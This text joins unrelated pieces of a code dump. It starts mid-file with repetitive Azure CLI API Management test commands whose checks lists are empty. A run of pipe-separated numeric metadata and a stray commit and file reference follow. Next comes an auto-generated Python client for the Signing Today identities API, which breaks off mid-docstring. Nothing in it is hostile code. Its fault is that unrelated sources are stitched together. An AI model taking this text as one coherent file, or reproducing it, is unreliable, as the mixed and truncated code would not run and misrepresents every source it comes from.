self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim product show --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product show --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product show --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# create_or_update -- create
self.cmd('apim product api create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
self.cmd('apim product api create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
# create_or_update -- update
self.cmd('apim product api update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
self.cmd('apim product api update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
# delete -- delete
self.cmd('apim product api delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
self.cmd('apim product api delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
# list_by_product -- list
self.cmd('apim product api list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product api list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# create_or_update -- create
self.cmd('apim product group create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
self.cmd('apim product group create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
# create_or_update -- update
self.cmd('apim product group update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
self.cmd('apim product group update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
# delete -- delete
self.cmd('apim product group delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
self.cmd('apim product group delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
# list_by_product -- list
self.cmd('apim product group list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product group list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# create_or_update -- create
self.cmd('apim product policy create --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801" --policy-id "policy" --value "<policies>\r\n <inbound>\r\n <rate-limit calls=\"{{call-count}}\" renewal-period=\"15\"></rate-limit>\r\n <log-to-eventhub logger-id=\"16\">\r\n @( string.Join(\",\", DateTime.UtcNow, context.Deployment.ServiceName, context.RequestId, context.Request.IpAddress, context.Operation.Name) ) \r\n </log-to-eventhub>\r\n <quota-by-key calls=\"40\" counter-key=\"cc\" renewal-period=\"3600\" increment-count=\"@(context.Request.Method == "POST" ? 1:2)\" />\r\n <base />\r\n </inbound>\r\n <backend>\r\n <base />\r\n </backend>\r\n <outbound>\r\n <base />\r\n </outbound>\r\n</policies>" --format "xml"', checks=[
])
self.cmd('apim product policy create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --policy-id "policy"', checks=[
])
# create_or_update -- update
self.cmd('apim product policy update --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801" --policy-id "policy" --value "<policies>\r\n <inbound>\r\n <rate-limit calls=\"{{call-count}}\" renewal-period=\"15\"></rate-limit>\r\n <log-to-eventhub logger-id=\"16\">\r\n @( string.Join(\",\", DateTime.UtcNow, context.Deployment.ServiceName, context.RequestId, context.Request.IpAddress, context.Operation.Name) ) \r\n </log-to-eventhub>\r\n <quota-by-key calls=\"40\" counter-key=\"cc\" renewal-period=\"3600\" increment-count=\"@(context.Request.Method == "POST" ? 1:2)\" />\r\n <base />\r\n </inbound>\r\n <backend>\r\n <base />\r\n </backend>\r\n <outbound>\r\n <base />\r\n </outbound>\r\n</policies>" --format "xml"', checks=[
])
self.cmd('apim product policy update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --policy-id "policy"', checks=[
])
# delete -- delete
self.cmd('apim product policy delete --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801" --policy-id "policy"', checks=[
])
self.cmd('apim product policy delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --policy-id "policy"', checks=[
])
# list_by_product -- list
self.cmd('apim product policy list --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801"', checks=[
])
self.cmd('apim product policy list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# get -- show
self.cmd('apim product policy show --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801" --policy-id "policy" --format "xml"', checks=[
])
self.cmd('apim product policy show --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --policy-id "policy"', checks=[
])
# create_or_update -- create
self.cmd('apim property create --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2" --secret true --display-name "prop3name" --value "propValue"', checks=[
])
self.cmd('apim property create --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2" --secret true', checks=[
])
self.cmd('apim property create --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
# create_or_update -- update
self.cmd('apim property update --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2" --secret true --display-name "prop3name" --value "propValue"', checks=[
])
self.cmd('apim property update --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2" --secret true', checks=[
])
self.cmd('apim property update --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
# delete -- delete
self.cmd('apim property delete --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
self.cmd('apim property delete --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
self.cmd('apim property delete --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
# list_by_service -- list
self.cmd('apim property list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim property list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim property list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim property show --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
self.cmd('apim property show --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
self.cmd('apim property show --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
# create_or_update -- create
self.cmd('apim subscription create --resource-group "rg1" --service-name "apimService1" --sid "testsub" --owner-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}" --scope "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/products/{{ product_name }}" --display-name "testsub"', checks=[
])
self.cmd('apim subscription create --resource-group "rg1" --service-name "apimService1" --sid "testsub" --display-name "testsub"', checks=[
])
self.cmd('apim subscription create --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
# create_or_update -- update
self.cmd('apim subscription update --resource-group "rg1" --service-name "apimService1" --sid "testsub" --owner-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}" --scope "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/products/{{ product_name }}" --display-name "testsub"', checks=[
])
self.cmd('apim subscription update --resource-group "rg1" --service-name "apimService1" --sid "testsub" --display-name "testsub"', checks=[
])
self.cmd('apim subscription update --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
# delete -- delete
self.cmd('apim subscription delete --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
self.cmd('apim subscription delete --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
self.cmd('apim subscription delete --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
# list -- list
self.cmd('apim subscription list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim subscription list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim subscription list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim subscription show --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
self.cmd('apim subscription show --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
self.cmd('apim subscription show --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
# create_or_update -- create
self.cmd('apim user create --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b" --email "foobar@outlook.com" --first-name "foo" --last-name "bar" --confirmation "signup"', checks=[
])
self.cmd('apim user create --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b" --email "foobar@outlook.com" --first-name "foo" --last-name "bar"', checks=[
])
self.cmd('apim user create --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
# create_or_update -- update
self.cmd('apim user update --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b" --email "foobar@outlook.com" --first-name "foo" --last-name "bar" --confirmation "signup"', checks=[
])
self.cmd('apim user update --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b" --email "foobar@outlook.com" --first-name "foo" --last-name "bar"', checks=[
])
self.cmd('apim user update --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
# delete -- delete
self.cmd('apim user delete --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
self.cmd('apim user delete --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
self.cmd('apim user delete --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
# list_by_service -- list
self.cmd('apim user list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim user list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim user list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim user show --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
self.cmd('apim user show --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
self.cmd('apim user show --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
| 57.230106
| 890
| 0.64042
| 12,292
| 112,915
| 5.857143
| 0.04027
| 0.109603
| 0.089686
| 0.168357
| 0.993402
| 0.993069
| 0.990361
| 0.988555
| 0.980166
| 0.969943
| 0
| 0.049465
| 0.193243
| 112,915
| 1,972
| 891
| 57.259128
| 0.740875
| 0.038808
| 0
| 0.778903
| 0
| 0.390717
| 0.759289
| 0.105144
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.005063
| 0.005063
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
2b60a0c5a3d9086b7a0de9c0f04fd2cf269cdd85
| 105
|
py
|
Python
|
test_cloud_mask.py
|
dahcase/gee_tools
|
4aa445e3a25ef2b9dd19762dc21ef5dcc9debc04
|
[
"MIT"
] | null | null | null |
test_cloud_mask.py
|
dahcase/gee_tools
|
4aa445e3a25ef2b9dd19762dc21ef5dcc9debc04
|
[
"MIT"
] | null | null | null |
test_cloud_mask.py
|
dahcase/gee_tools
|
4aa445e3a25ef2b9dd19762dc21ef5dcc9debc04
|
[
"MIT"
] | 1
|
2022-01-13T23:39:05.000Z
|
2022-01-13T23:39:05.000Z
|
# coding=utf-8
from geetools.tests import test_cloud_mask
import unittest
unittest.main(test_cloud_mask)
| 21
| 42
| 0.847619
| 17
| 105
| 5
| 0.705882
| 0.211765
| 0.305882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010417
| 0.085714
| 105
| 5
| 43
| 21
| 0.875
| 0.114286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
994475f5fa56263bed07d1a12e0ef5c08bacdbb0
| 104,848
|
py
|
Python
|
signing_today_client/api/bit4id_pathgroup_identities_api.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
signing_today_client/api/bit4id_pathgroup_identities_api.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
signing_today_client/api/bit4id_pathgroup_identities_api.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Signing Today API
*Signing Today* enables seamless integration of digital signatures into any
website by the use of easy requests to our API. This is the smart way of
adding digital signature support with a great user experience.


*Signing Today APIs* use HTTP methods and are RESTful based, moreover they
are protected by a *server to server authentication* standard by the use of
tokens.


*Signing Today APIs* can be used in these environments:


| Environment | Description | Endpoint |
| ----------- | ----------- | -------- |
| Sandbox     | Test environment | `https://sandbox.signingtoday.com` |
| Live        | Production environment | `https://api.signingtoday.com` |


For every single request to Signing Today has to be defined the following
*HTTP* header:
- `Authorization`, which contains the authentication token.

If the request has a body than another *HTTP* header is requested:
- `Content-Type`, with `application/json` value.


Follows an example of usage to enumerate all the user of *my-org*
organization.

**Example**

```json
$ curl https://sandbox.signingtoday.com/api/v1/my-org/users \
    -H 'Authorization: Token <access-token>'
```

## HTTP methods used

APIs use the right HTTP verb in every situation.

| Method   | Description                    |
| -------- | ------------------------------ |
| `GET`    | Request data from a resource   |
| `POST`   | Send data to create a resource |
| `PUT`    | Update a resource              |
| `PATCH`  | Partially update a resource    |
| `DELETE` | Delete a resourse              |


## Response definition

All the response are in JSON format.
As response to a request of all users of an organization you will have a
result like this:

```json
{
    "pagination": {
      "count": 75,
      "previous": "https://sandbox.signingtoday.com/api/v1/my-org/users?page=1",
      "next": "https://sandbox.signingtoday.com/api/v1/my-org/users?page=3",
      "pages": 8,
      "page": 2
    },
    "meta": {
      "code": 200
    },
    "data": [
      {
        "id": "jdo",
        "status": "enabled",
        "type": "Basic user account",
        "email": johndoe@dummyemail.com,
        "first_name": "John",
        "last_name": "Doe",
        "wallet": [],
        "created_by": "system",
        "owner": false,
        "automatic": false,
        "rao": false
      },
      ...
    ]
  }
```

The JSON of the response is made of three parts:
- Pagination
- Meta
- Data

### Pagination

*Pagination* object allows to split the response into parts and then to
rebuild it sequentially by the use of `next` and `previous` parameters, by
which you get previous and following blocks. The *Pagination* is present
only if the response is a list of objects.

The general structure of *Pagination* object is the following:

```json
{
    "pagination": {
      "count": 75,
      "previous": "https://sandbox.signingtoday.com/api/v1/my-org/users?page=1",
      "next": "https://sandbox.signingtoday.com/api/v1/my-org/users?page=3",
      "pages": 8,
      "page": 2
    },
    ...
  }
```

### Meta

*Meta* object is used to enrich the information about the response. In the
previous example, a successful case of response, *Meta* will have value
`status: 2XX`. In case of unsuccessful response, *Meta* will have further
information, as follows:

```json
{
    "meta": {
      "code": <HTTP STATUS CODE>,
      "error_type": <STATUS CODE DESCRIPTION>,
      "error_message": <ERROR DESCRIPTION>
    }
  }
```

### Data

*Data* object outputs as object or list of them. Contains the expected data
as requested to the API.

## Search filters

Search filters of the API have the following structure:

`where_ATTRIBUTENAME`=`VALUE`

In this way you make a case-sensitive search of *VALUE*. You can extend it
through the Django lookup, obtaining more specific filters. For example:

`where_ATTRIBUTENAME__LOOKUP`=`VALUE`

where *LOOKUP* can be replaced with `icontains` to have a partial insensitive
research, where

`where_first_name__icontains`=`CHa`

matches with every user that have the *cha* string in their name, with
no differences between capital and lower cases.

[Here](https://docs.djangoproject.com/en/1.11/ref/models/querysets/#field-lookups)
the list of the lookups.

## Webhooks

Signing Today supports webhooks for the update of DSTs and identities status.
You can choose if to use or not webhooks and if you want to receive updates
about DSTs and/or identities. You can configurate it on application token
level, in the *webhook* field, as follows:

```json
"webhooks": {
  "dst": "URL",
  "identity": "URL"
  }
```

### DSTs status update

DSTs send the following status updates:
- **DST_STATUS_CHANGED**: whenever the DST changes its status
- **SIGNATURE_STATUS_CHANGED**: whenever one of the signatures changes its
status

#### DST_STATUS_CHANGED

Sends the following information:

```json
{
    "message": "DST_STATUS_CHANGED",
    "data": {
      "status": "<DST_STATUS>",
      "dst": "<DST_ID>",
      "reason": "<DST_REASON>"
    }
  }
```

#### SIGNATURE_STATUS_CHANGED

Sends the following information:

```json
{
    "message": "SIGNATURE_STATUS_CHANGED",
    "data": {
      "status": "<SIGNATURE_STATUS>",
      "group": <MEMBERSHIP_GROUP_INDEX>,
      "dst": {
        "id": "<DST_ID>",
        "title": "<DST_TITLE>"
      },
      "signature": "<SIGNATURE_ID>",
      "signer": "<SIGNER_USERNAME>",
      "position": "<SIGNATURE_POSITION>",
      "document": {
        "display_name": "<DOCUMENT_TITLE>",
        "id": "<DOCUMENT_ID>",
        "order": <DOCUMENT_INDEX>
      },
      "automatic": <DECLARES_IF_THE_SIGNER_IS_AUTOMATIC>,
      "page": "<SIGNATURE_PAGE>"
    }
  }
```

### Identities status update

Identities send the following status updates:
- **IDENTITY_REQUEST_ENROLLED**: whenever an identity request is activated

#### IDENTITY_REQUEST_ENROLLED

Sends the following information:

```json
{
    "message": "IDENTITY_REQUEST_ENROLLED",
    "data": {
      "status": "<REQUEST_STATUS>",
      "request": "<REQUEST_ID>",
      "user": "<APPLICANT_USERNAME>"
    }
  }
```

### Urlback

Sometimes may be necessary to make a redirect after an user, from the
signature tray, has completed his operations or activated a certificate.

If set, redirects could happen in 3 cases:
- after a signature or decline
- after a DST has been signed by all the signers or canceled
- after the activation of a certificate

In the first two cases the urlback returns the following information through
a data form:
- **dst-id**: id of the DST
- **dst-url**: signature_ticket of the signature
- **dst-status**: current status of the DST
- **dst-signature-id**: id of the signature
- **dst-signature-status**: current status of the signature
- **user**: username of the signer
- **decline-reason**: in case of a refused DST contains the reason of the
decline

In the last case the urlback returns the following information through a
data form:
- **user**: username of the user activated the certificate
- **identity-provider**: the provider has been used to issue the certificate
- **identity-request-id**: id of the enrollment request
- **identity-id**: id of the new identity
- **identity-label**: the label assigned to the identity
- **identity-certificate**: public key of the certificate


 # noqa: E501
The version of the OpenAPI document: 1.5.0
Contact: smartcloud@bit4id.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from signing_today_client.api_client import ApiClient
from signing_today_client.exceptions import (
ApiTypeError,
ApiValueError
)
class Bit4idPathgroupIdentitiesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def associate_appearance(self, organization_id, identity_id, inline_object, **kwargs): # noqa: E501
"""Associate an appearance to an identity # noqa: E501
Associate a signature appearance to an already existing identity through an url to an image. This appearance will be displayed on the document after the signature. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.associate_appearance(organization_id, identity_id, inline_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of an user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param InlineObject inline_object: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2004
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.associate_appearance_with_http_info(organization_id, identity_id, inline_object, **kwargs) # noqa: E501
def associate_appearance_with_http_info(self, organization_id, identity_id, inline_object, **kwargs): # noqa: E501
"""Associate an appearance to an identity # noqa: E501
Associate a signature appearance to an already existing identity through an url to an image. This appearance will be displayed on the document after the signature. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.associate_appearance_with_http_info(organization_id, identity_id, inline_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of an user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param InlineObject inline_object: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2004, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_id', 'inline_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method associate_appearance" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `associate_appearance`") # noqa: E501
# verify the required parameter 'identity_id' is set
if ('identity_id' not in local_var_params or
local_var_params['identity_id'] is None):
raise ApiValueError("Missing the required parameter `identity_id` when calling `associate_appearance`") # noqa: E501
# verify the required parameter 'inline_object' is set
if ('inline_object' not in local_var_params or
local_var_params['inline_object'] is None):
raise ApiValueError("Missing the required parameter `inline_object` when calling `associate_appearance`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'identity_id' in local_var_params:
path_params['identity-id'] = local_var_params['identity_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object' in local_var_params:
body_params = local_var_params['inline_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/{identity-id}/appearance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2004', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def associate_identity(self, organization_id, user_id, identity_association, **kwargs): # noqa: E501
"""Associate to an user an already existing identity # noqa: E501
Associate to an user of the organization an already existing identity of a provider. The _provider_data_ field is an object and is different for each provider. The minimum set of information to provide as provider_data is the following: - **aruba** - _auth_domain_ : string - _username_ : string - _password_ : string - **aruba-auto** - _auth_domain_ : string - _username_ : string - _password_ : string - **infocert** - _username_ : string - _password_ : string - **namirial** - _id_titolare_ : string - _id_otp_ : string - _username_ : string - _password_ : string # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.associate_identity(organization_id, user_id, identity_association, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param IdentityAssociation identity_association: Provider data to associate (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2004
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.associate_identity_with_http_info(organization_id, user_id, identity_association, **kwargs) # noqa: E501
def associate_identity_with_http_info(self, organization_id, user_id, identity_association, **kwargs): # noqa: E501
"""Associate to an user an already existing identity # noqa: E501
Associate to an user of the organization an already existing identity of a provider. The _provider_data_ field is an object and is different for each provider. The minimum set of information to provide as provider_data is the following: - **aruba** - _auth_domain_ : string - _username_ : string - _password_ : string - **aruba-auto** - _auth_domain_ : string - _username_ : string - _password_ : string - **infocert** - _username_ : string - _password_ : string - **namirial** - _id_titolare_ : string - _id_otp_ : string - _username_ : string - _password_ : string # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.associate_identity_with_http_info(organization_id, user_id, identity_association, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param IdentityAssociation identity_association: Provider data to associate (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2004, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'user_id', 'identity_association'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method associate_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `associate_identity`") # noqa: E501
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ApiValueError("Missing the required parameter `user_id` when calling `associate_identity`") # noqa: E501
# verify the required parameter 'identity_association' is set
if ('identity_association' not in local_var_params or
local_var_params['identity_association'] is None):
raise ApiValueError("Missing the required parameter `identity_association` when calling `associate_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'user_id' in local_var_params:
path_params['user-id'] = local_var_params['user_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'identity_association' in local_var_params:
body_params = local_var_params['identity_association']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/users/{user-id}/wallet', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2004', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_token_from_identity(self, organization_id, create_identityby_token, **kwargs): # noqa: E501
"""Create an identity from token # noqa: E501
This API allows to create an identity from a token. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_token_from_identity(organization_id, create_identityby_token, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param CreateIdentitybyToken create_identityby_token: Body of the request to create an identity from a token (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
